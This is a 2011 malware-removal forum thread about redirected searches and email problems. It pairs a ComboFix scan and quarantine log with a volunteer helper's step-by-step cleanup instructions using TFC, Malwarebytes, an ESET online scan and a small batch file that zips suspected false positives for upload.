2011-06-10 13:07 . 2011-06-13 20:44 -------- d-----w- C:\@malware
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
.
(((((((((((((((((((((((((((((((((((((((((((( Look )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
---- Directory of C:\@malware ----
.
2011-06-13 06:16 . 2011-06-13 05:45 4121087 ----a-r- c:\@malware\ComboFix.exe
2011-06-13 06:08 . 2011-06-13 06:08 16150 ----a-w- c:\@malware\log.txt
2011-06-13 05:42 . 2011-06-13 05:42 86 ----a-w- c:\@malware\catchme.log
2011-06-13 05:28 . 2011-06-13 05:28 52676424 ----a-w- c:\@malware\avira_antivir_personal_en.exe
2011-06-13 05:00 . 2011-06-13 05:39 636409 ----a-w- c:\@malware\6-13 malware.docx
2011-06-12 12:56 . 2011-06-12 12:53 2204 ----a-w- c:\@malware\SystemLook.txt
2011-06-12 12:56 . 2011-06-12 12:47 75264 ----a-w- c:\@malware\SystemLook.exe
2011-06-12 12:49 . 2011-06-12 12:59 24438 ----a-w- c:\@malware\6-12 b malware.docx
2011-06-12 06:31 . 2011-06-12 06:30 1419 ----a-w- c:\@malware\aswMBR.txt
2011-06-12 06:31 . 2011-06-12 06:30 512 ----a-w- c:\@malware\MBR.dat
2011-06-12 06:27 . 2011-06-12 06:08 420691 ----a-w- c:\@malware\VPPClean.exe
2011-06-12 06:27 . 2011-06-12 06:50 36713 ----a-w- c:\@malware\6-12 malware.docx
2011-06-12 06:27 . 2011-06-12 06:09 139264 ----a-w- c:\@malware\RKUnhookerLE.EXE
2011-06-12 06:27 . 2011-06-12 06:08 581120 ----a-w- c:\@malware\aswMBR.exe
2011-06-09 13:33 . 2011-06-09 13:38 1511 ----a-w- c:\@malware\malware.txt
2011-06-09 12:56 . 2011-06-09 12:56 12146 ----a-w- c:\@malware\report.txt
2011-06-08 19:55 . 2011-06-08 19:55 29275 ----a-w- c:\@malware\1attach.txt
2011-06-08 19:53 . 2011-06-08 19:53 9727 ----a-w- c:\@malware\1dds.txt
2011-06-08 19:50 . 2011-06-08 19:50 607222 ----a-r- c:\@malware\dds.scr
2011-01-14 22:45 . 2011-01-14 22:45 10252056 ----a-w- c:\@malware\VueMinder_Lite_Setup_8.0.1.exe
2008-08-14 16:55 . 2011-06-13 20:39 39075 ----a-w- c:\@malware\13-6 b malware.docx
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2011-03-28 281768]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [6/13/2011 2:11 AM 136360]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - SSMDRV
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-13 17:04
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(924)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(3636)
c:\windows\system32\WININET.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\IEFRAME.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
.
**************************************************************************
.
Completion time: 2011-06-13 17:16:01 - machine was rebooted
ComboFix-quarantined-files.txt 2011-06-13 21:15
ComboFix2.txt 2011-06-13 06:03
.
Pre-Run: 58,194,358,272 bytes free
Post-Run: 58,117,988,352 bytes free
.
Current=9 Default=9 Failed=8 LastKnownGood=10 Sets=1,2,3,4,5,6,7,8,9,10
- - End Of File - - F40009F5A26D7381F58F365727D08797


ComboFix-quarantined-files.txt

2011-06-13 20:58:06 . 2011-06-13 20:58:06 2,532 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Service_SamSs32.reg.dat
2011-06-13 20:58:06 . 2011-06-13 20:58:06 836 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Legacy_SAMSS32.reg.dat
2011-06-13 20:51:39 . 2011-06-13 20:51:40 1,861,276 ----a-w- C:\Qoobox\Quarantine\[4]-Submit_2011-06-13_16.51.31.zip
2011-06-13 06:02:16 . 2011-06-13 06:02:16 2,092 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-ISA_CLV_module.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 622 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-SBAMTray.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 600 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-ISTray.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 656 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-DriverScanner.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 584 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-AVG_TRAY.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 668 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-Adobe Reader Speed Launcher.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 636 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-Adobe ARM.reg.dat
2011-06-13 06:01:55 . 2011-06-13 06:01:55 171 ----a-w- C:\Qoobox\Quarantine\Registry_backups\WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 171 ----a-w- C:\Qoobox\Quarantine\Registry_backups\WebBrowser-{D4027C7F-154A-4066-A1AD-4243D8127440}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 213 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 173 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Toolbar-Locked.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:54 376 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{2045AB79-11EA-4BBF-8735-DBD28E5359Bc}.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:53 421 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{17CC8F5E-78E0-AD0B-6459-5D135F28F580}.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:53 376 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{1022D5BC-11EA-4BBF-8735-DBD28E5359Bc}.reg.dat
2011-06-13 05:56:53 . 2011-06-13 20:57:57 7,525 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2011-06-13 05:44:34 . 2011-06-13 20:49:54 204 ----a-w- C:\Qoobox\Quarantine\catchme.log
2011-06-10 13:59:03 . 2011-06-10 13:59:03 11 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270S.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:03 11 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270O.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:03 13 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270C.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:14 1,812 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270P.manifest.vir
2011-06-10 13:07:05 . 2011-06-10 13:07:05 0 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\aarexiymqh.tmp.vir
2011-06-10 04:29:21 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad ils32.exe.vir
2011-06-10 04:29:20 . 2011-06-10 04:29:20 168,960 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad kbdycl32.dll.vir
2011-06-10 04:29:16 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad dfshim32.exe.vir
2011-06-10 04:29:11 . 2011-06-10 04:29:11 359,424 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad ativtmxx32.dll.vir
2011-06-10 04:29:08 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\0.15188298399276234.exe.vir
2011-04-17 18:34:39 . 2011-04-17 18:34:39 61,485 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.dat.vir
2011-04-17 18:34:36 . 2006-08-21 01:59:15 4,846 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.ico.vir
2011-04-17 18:34:36 . 2009-02-16 22:23:35 37,888 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\_Setup.dll.vir
2011-04-17 18:34:36 . 2011-04-17 18:34:30 83,456 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.exe.vir
2010-01-13 16:10:15 . 2008-03-28 22:23:28 2,768,896 ----a-w- C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
2009-08-13 14:05:03 . 2009-09-04 14:17:34 4 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\ESQULzxspectrum.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 9,229 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\overlay.xul.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 770 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\install.rdf.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 2,125 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\_cfg.js.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 120 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome.manifest.vir
2007-03-23 20:34:42 . 2007-11-22 17:13:24 221,184 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
2007-01-07 16:48:01 . 2006-09-21 19:58:16 811,560 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\GoogleToolbarInstaller_en.exe.vir
2006-09-14 07:19:40 . 2006-09-14 07:20:29 481 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\ST6UNST.000.vir

Re: redirected searches and email problems

Unread postby melboy » June 13th, 2011, 7:32 pm

Hi

    I created the directory c:\@malware to hold the anti-malware exe’s and logs so they wouldn’t be lost to me.
    I also added the (bad) prefix to these files because they kept trying to run in the taskmanager
Nice thinking - well done!

    PEV.exe has encountered a problem and must close. etc. etc.etc. send report or don't send
    I did nothing.
OK, thanks for letting me know.

I want to check a couple of files I believe may be false positives.

Upload for analysis

Open notepad and copy/paste the text in the codebox below into it:
(Do Not include code:)
Code:
@echo off
for %%g in (
C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
) do zip Files_for_submission %%g
del %0 



  • Go to File > Save as... & save this as grab.bat
  • Choose to "Save type as" - "All Files"
  • Save it on your desktop. It should look like this: Image
  • Double click on grab.bat & allow it to run

A file, "Files_for_submission.zip" will be created on your desktop.
Please upload that file here --> http://www.bleepingcomputer.com/submit- ... ?channel=4

  • In the Link to topic where this file was requested: box, copy and paste the following link inside the code box:
    Code:
    http://malwareremoval.com/forum/viewtopic.php?p=582417#p582417
  • Click Browse and browse to the file: Files_for_submission.zip
  • In the Leave any comments, further information about this file, or contact information: box, please copy & paste in:
    Code:
    Requested by melboy. Files for analysis
  • Click Send File
  • Once you see:
Your file was successfully submitted. Please let the user helping you know that you have submitted the file.

Close the site and let me know the upload was successful.



TFC

  • Please download TFC by Old Timer to your desktop,
  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs; let it run uninterrupted. It should not take longer than a couple of minutes, and may only take a few seconds. Only if needed will you be prompted to reboot.



Malwarebytes' Anti-Malware (MBAM)

As you have Malwarebytes' Anti-Malware installed on your computer, could you please do a scan using these settings:

  • Open Malwarebytes' Anti-Malware
  • Select the Update tab
  • Click Check for Updates
  • After the update has been completed, select the Scanner tab.
  • Select Perform Quick scan, then click on Scan
  • When done, you will be prompted. Click OK. If Items are found, then click on Show Results
  • Check all items then click on Remove Selected
  • After it has removed the items, Notepad will open. Please post this log in your next reply.

    The log can also be found here:
    1. C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
    2. Or via the Logs tab when the application is started.

Note: MBAM may ask to reboot your computer so it can continue with the removal process, please do so immediately.
Failure to reboot will prevent MBAM from removing all the malware.

Re: redirected searches and email problems

Unread postby ard » June 14th, 2011, 1:10 am

Hi -

step 1 -
I uploaded "Files_for_submission.zip" to:
http://www.bleepingcomputer.com/submit- ... ?channel=4

step 2 -
I ran TFC

step 3 -
I ran MBAM the mbam log file is below


Malwarebytes' Anti-Malware 1.51.0.1200
www.malwarebytes.org

Database version: 6851

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

6/14/2011 12:43:22 AM
mbam-log-2011-06-14 (00-43-22).txt

Scan type: Quick scan
Objects scanned: 174312
Time elapsed: 5 minute(s), 40 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 4

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
c:\WINDOWS\system32\02000000f71535641270c.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270o.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270p.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270s.manifest (Malware.Trace) -> Quarantined and deleted successfully.

Re: redirected searches and email problems

Unread postby melboy » June 14th, 2011, 1:41 pm

Hi

It's confirmed that the two files you uploaded are false positives. One of which was BibleSpeak.exe
C:\BibleSpeak\BibleSpeak.exe

It's good practice to install programs to the %Programfiles% directory (C:\Program Files), rather than install them to the root of the drive (C:\) ;)

We'll restore them in due course - We're nearly finished.

If you're able then, re-install it to the Program Files folder.



Update Java Runtime

You are using an old version of Java. Oracle's Java (Was Sun Java) is sometimes updated in order to eliminate the exploitation of vulnerabilities in an existing version. For this reason, it's extremely important that you keep the program up to date, and also remove the older more vulnerable versions from your system. The most current version of Oracle Java is: Java Runtime Environment Version 6 Update 26.

  • Go to Oracle Java
  • Scroll down to where it says "Java Platform, Standard Edition. Java SE 6 Update 26"
  • Click the Download JRE button to the right.
  • Check the box to Accept License Agreement
  • In the list of files, Look to Windows x86 Offline & click on the link to the right which says "jre-6u26-windows-i586.exe" and save the downloaded file to your desktop.
  • Uninstall all old versions of Java via Start > Control Panel > Add/Remove Programs:
    Java(TM) 6 Update 20
  • Install the new version by running the newly-downloaded file with the java icon which will be at your desktop, and follow the on-screen instructions.
  • Reboot your computer



TFC

You should still have this on your desktop.

  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs; let it run uninterrupted. It should not take longer than a couple of minutes, and may only take a few seconds. Only if needed will you be prompted to reboot.



ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan. You will however need to disable your currently installed Anti-Virus; how to do so can be read here.

  • Please go here to run the scan.
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient, this may take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed make sure you first copy the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt
  • Copy and paste that log as a reply to this topic.
  • Now click on: Image (Selecting Uninstall application on close if you so wish)
  • Re-enable your anti-virus software.



Defence Inspector

Please download Defence Inspector and save it to your desktop.

  • Double-click DefenceInspector.exe to run it.
  • When presented with the option to begin the scan, please press any key to continue.
  • When DefenceInspector has finished scanning a log will appear.
  • Please post the contents of this log in your next reply.




In your next reply:
  1. ESET log
  2. DefenceInspector log

Re: redirected searches and email problems

